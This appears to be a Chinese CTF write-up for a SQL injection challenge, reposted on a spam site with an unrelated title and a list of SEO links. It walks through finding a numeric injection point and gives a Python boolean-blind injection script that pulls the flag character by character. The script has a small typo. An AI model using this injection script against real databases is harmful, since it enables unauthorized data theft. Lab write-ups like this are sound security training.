当前位置: 首页 > news >正文

昆明有多少做网站的公司电话营销

昆明有多少做网站的公司,电话营销,wordpress本地化采用方法,网站建设的完整流程图1、通过题目,可以知道该题目为SQL注入类型: 2、判断注入类型为数字注入: 3、通过BP抓包,来判断注入点。 字典爆破发现常规的注入方式都被过滤。 4、因此可以尝试通过布尔盲注的方式来得到flag。编写脚本得到flag import requests…

1、通过题目,可以知道该题目为SQL注入类型:

2、判断注入类型为数字注入:

3、通过BP抓包,来判断注入点。

字典爆破发现常规的注入方式都被过滤。

4、因此可以尝试通过布尔盲注的方式来得到flag。编写脚本得到flag

import requests

url = "http://977ba0f7-8772-4617-9600-8089c3d7e1e3.node5.buuoj.cn:81/index.php"
result = ""
for i in range(1, 50):
        for j in range(32, 128):
                payload = "(ascii(substr((select(flag)from(flag)),{m},1))>{n})"
                response = requests.post(url=url, data={'id': payload.format(m=i, n=j)})
# {m} 是当前正在提取的 flag 字符位置,{n} 是 ASCII 码值,用于比较。
                f response.text.find('girl') == -1:
                        result += chr(j)
                        print(j)
                        break
        print("正在输出flag:", result)
print("flag:", result)

#外层循环 (for i in range(1, 50)):循环遍历 flag 的每个字符位置,假设 flag 最长为 50 个字符。
#内层循环 (for j in range(32, 128)):循环遍历 ASCII 字符集中的可打印字符(从空格到 '~')。
#payload 变量:构造了一个 SQL 注入 payload,使用 substr() 函数逐个提取 flag 的字符,并通过 ascii() 函数转换为 ASCII 码值,然后与 j 比较。

5、得到flag:

http://www.mmbaike.com/news/108816.html

相关文章:

  • 一般app开发费用多少广州seo外包多少钱
  • 初中学历怎么报考成人大专百度seo搜索排名
  • dw网页制作三个页面跳转seo知名公司
  • 做企业网站需要服务器么流量推广app
  • 重庆网站seo多少钱今日军事新闻最新消息中国
  • 网站建设域名的购买安卓神级系统优化工具
  • 装修设计网站哪个最好怎样在百度发广告贴
  • 深圳网站制作专业公司搜索引擎是什么意思啊
  • 水利建设相关网站西安网站建设推广优化
  • 汶上哪个广告公司做网站如何宣传推广
  • 有没有做的很炫的科技型网站站长之家素材网
  • 常州微网站建设如何做市场调研和分析
  • 如何做电影网站 去哪里找片源怎样做网站卖自己的产品
  • 襄州区城乡建设局网站口碑营销的优势
  • cms 网站后台内容管理系统模板网站开发流程图
  • 上海网站建设微信开发小红书seo优化
  • 网站建设 公司百度手机助手app官方下载
  • 中国建设机械教育网官方网站宁波关键词优化平台
  • 企业网站建设网站球队积分排名
  • 做网站要哪些架包谷歌海外推广怎么做
  • 怎么做网站301重定向sem推广是什么意思
  • 绿色建筑信息平台推广优化工具
  • 做脚本网站网络营销的工具和方法有哪些
  • 德州网站优化刷外链网站
  • 最优秀的佛山网站建设沈阳企业网站seo公司
  • 专业的网站建设哪家好今天的新闻 联播最新消息
  • dwcc怎么做网站建站模板哪个好
  • 医保局网站建设中标公告网站设计制作在哪能看
  • 网站做邮箱it培训机构培训费用
  • 无人区电影中加油站司机百度指数数据